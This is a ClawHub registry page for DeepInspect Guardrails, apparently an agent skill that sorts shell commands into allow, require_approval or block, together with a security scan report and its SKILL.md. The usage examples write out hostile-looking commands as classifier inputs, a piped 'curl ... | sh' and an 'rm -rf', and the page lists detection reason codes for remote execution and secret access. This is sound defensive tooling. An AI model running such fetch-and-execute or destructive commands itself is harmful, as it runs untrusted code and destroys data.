ClawHub

DeepInspect Guardrails

v1.0.0

Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes.

0· 504·0 current·0 all-time
by@parmindersk
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Benign
high confidence
Purpose & Capability
The name/description match the implementation: the code classifies command strings into allow/require_approval/block and emits reason codes. The policy file contains patterns and actions that the code uses. One minor inconsistency: policy.baseline.json contains an allowlistedDomains field that is not referenced by the implementation (harmless but unused).
Instruction Scope
SKILL.md directs local use of the provided node CLI and tests. The instructions and code only read the bundled policy file and the provided command string; they do not access external endpoints, environment secrets, or unrelated system configuration.
Install Mechanism
No install spec is present (lowest risk) and all code is local. However, SKILL.md and the CLI require node to run but the registry metadata lists no required binaries — this is a minor coherence gap (you need node/npm on PATH to run the skill). There are no remote downloads or archive extracts.
Credentials
The skill requests no environment variables or credentials and the code does not read secrets or config paths beyond the included policy file. The policy flags patterns that match sensitive paths (e.g., ~/.ssh, /etc) but the skill only detects those patterns rather than accessing those files.
Persistence & Privilege
The skill does not request persistent presence, does not write global agent configuration, and does not require elevated privileges. The skill is user-invocable and not always-enabled.
Assessment
This skill appears to implement what it claims: a local preflight classifier for shell-like commands. Before installing or running it: (1) ensure you have Node.js available (SKILL.md assumes node but required-binaries is empty), (2) review and, if needed, adjust policy.baseline.json.workspaceRoots to match your actual project workspace so OUTSIDE_WORKSPACE_PATH detection is meaningful, (3) verify the allowlistedDomains entry if you expect network checks (the code doesn't use it), and (4) because the source is 'unknown', inspect the included files yourself before granting any automation privileges — running the CLI locally is low-risk, but don't enable autonomous invocation in an environment where unreviewed skills can run commands without supervision.

Like a lobster shell, security has layers — review code before you run it.

latestvk970wxvjvmbc9494c7jkqjhdv181a022

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

SKILL.md

OpenClaw Guardrails (MVP)

DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.

What it does (MVP)

  • Classifies requested command risk
  • Returns allow, require_approval, or block
  • Emits reason codes for explainability
  • Uses a baseline balanced profile in policy.baseline.json

Decision outputs

  • allow
  • require_approval
  • block

Reason codes (examples)

  • REMOTE_EXEC_PATTERN
  • DESTRUCTIVE_PATTERN
  • PRIVILEGE_ESCALATION_PATTERN
  • SYSTEM_MUTATION_PATTERN
  • SECRET_ACCESS_PATTERN
  • OUTSIDE_WORKSPACE_PATH

Local usage

node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"

Run tests

node skills/openclaw/guardrails/tests/decide.test.js

How to tune policy

Edit:

  • workspaceRoots
  • allowlistedDomains
  • highRiskPatterns
  • actions

in policy.baseline.json.

Files

5 total
Select a file
Select a file to preview.

Comments

Loading comments…